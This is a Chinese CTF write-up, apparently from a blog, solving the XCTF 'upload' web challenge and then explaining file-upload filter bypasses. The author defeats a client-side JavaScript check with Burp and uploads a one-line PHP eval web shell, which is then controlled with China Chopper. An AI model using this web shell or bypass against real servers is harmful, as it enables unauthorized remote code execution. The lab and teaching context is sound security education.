XCTF攻防世界web进阶练习_ 4_upload

XCTF攻防世界web进阶练习—upload

题目

题目为updoad,是上传的意思,应该是文件上传相关题目

打开题目,不出意料,要求上传文件。在这里插入图片描述
这里先试着随便上传一个php文件,试试水
在这里插入图片描述
弹出一个弹窗,提示要求上传一个图片
注意:这里是弹窗提示,所以考虑是js过滤。
所以传入一个内容为php,后缀为jpg文件上传,用burp抓包
在这里插入图片描述
将filename改为pino.php,内容为phpinfo()
go! 成功上传!并返回了上传位置为upload/1556697521.pino.php
在这里插入图片描述
去到upload/1556697521.pino.php看看upload/1556697521.pino.php
看来成功上传并执行了php中的内容。

接下来上传简单的一句话,并将上传文件名字改为abc.php

<?php @eval($_POST['chopper']);?>

在这里插入图片描述

依旧成功上传,路径为upload/1556698010.abc.php
接下来用菜刀连接
在这里插入图片描述
成功连接!在这里插入图片描述
直接打开flag.php即可获得flag!!在这里插入图片描述

关于上传绕过

文件上传漏洞是web安全中经常利用到的一种漏洞形式。一些web应用程序中允许上传图片,文本或者其他资源到指定的位置,文件上传漏洞就是利用这些可以上传的地方将恶意代码植入到服务器中,再通过url去访问以执行代码,达到不可描述的目的。
但在一些安全性较高的web应用中,往往会有各种上传限制和过滤,导致我们无法上传特定的文件。

这些验证可以分为客户端验证和服务器端验证

客户端验证

客户端验证主要是通过js来进行验证,对于这类验证方法,我们可以通过先将文件更改为它能够通过的类型或内容,然后再burpsuite抓包改包即可绕过

服务器端验证

服务器端的验证主要分为对文件名的检验和对文件内容的检验

对文件名的检验
服务器对文件名的检验就是检查上传文件的后缀名,若有非法的后缀名就将其拦截。这类检验可以分为白名单检验和黑名单检验。

白名单检验就是只有服务器名单上的后缀名才能够上传。
黑名单检验就是在黑名单中的文件后缀不能上传。

想要了解更多可以参考:
https://thief.one/2016/09/22/上传木马姿势汇总
https://www.cnblogs.com/ssooking/articles/6567912.html
http://byd.dropsec.xyz/2017/02/21/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0-%E7%BB%95%E8%BF%87/

评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值